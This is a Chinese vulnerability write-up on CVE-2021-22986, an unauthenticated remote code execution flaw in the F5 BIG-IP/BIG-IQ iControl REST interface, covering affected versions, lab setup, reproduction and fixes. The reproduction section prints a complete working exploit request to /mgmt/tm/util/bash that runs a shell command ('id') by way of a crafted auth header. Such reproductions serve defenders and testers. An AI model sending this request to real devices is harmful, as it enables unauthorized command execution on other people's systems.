文章来源:Timeline Sec

0x01 简介


F5 BIG-IP是美国 F5 公司的一款集成了网络流量管理、应用程序安全管理、负载均衡等功能的应用交付平台。


0x02 漏洞概述


编号:CVE-2021-22986
F5 BIG-IP/BIG-IQ iControl REST 未授权远程代码执行漏洞中,未经身份验证的攻击者可通过iControl REST接口,构造恶意请求,执行任意系统命令。


0x03 影响版本


F5 BIG-IP 16.0.0-16.0.1

F5 BIG-IP 15.1.0-15.1.2

F5 BIG-IP 14.1.0-14.1.3.1

F5 BIG-IP 13.1.0-13.1.3.5

F5 BIG-IP 12.1.0-12.1.5.2

F5 BIG-IQ 7.1.0-7.1.0.2

F5 BIG-IQ 7.0.0-7.0.0.1

F5 BIG-IQ 6.0.0-6.1.0


0x04 环境搭建


流程如下:


CVE-2021-22986:BIG-IP/BIG-IQ未授权RCE_安全技术


1、登陆F5官网申请测试license 90天

https://www.f5.com/trials


2、按流程注册登陆后获得license,会发送至注册邮箱


3、下载漏洞版本镜像

https://downloads.f5.com/esd/product.jsp?sw=BIG-IP&pro=big-ip_v14.x&ver=14.1.2


4、下载后使用Vmware安装即可


0x05 漏洞复现


数据包如下,其中


Authorization: Basic YWRtaW46QVNhc1M=
base64解码值为admin:ASasS
需要注意此处X-F5-Auth-Token值为空


CVE-2021-22986:BIG-IP/BIG-IQ未授权RCE_技术分享_02


POC:


POST /mgmt/tm/util/bash HTTP/1.1Host: your_ipUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateAuthorization: Basic YWRtaW46QVNhc1M=X-F5-Auth-Token: Connection: closeUpgrade-Insecure-Requests: 1Content-Length: 41
{"command":"run","utilCmdArgs":"-c id"}


CVE-2021-22986:BIG-IP/BIG-IQ未授权RCE_技术分享_03


0x06 修复方式



1、建议将F5 BIG-IP / BIG-IQ 升级至安全版本。

下载地址参考:

https://support.f5.com/csp/article/K02566623

2、建议利用阿里云安全组功能为 F5 BIG-IP / BIG-IQ 相关管理界面设置白名单,仅对可信地址开放访问。


参考链接:

http://www.jsdjbh.gov.cn/tgyj/746.htm

https://www.freebuf.com/vuls/266899.html

CVE-2021-22986:BIG-IP/BIG-IQ未授权RCE_技术分享_04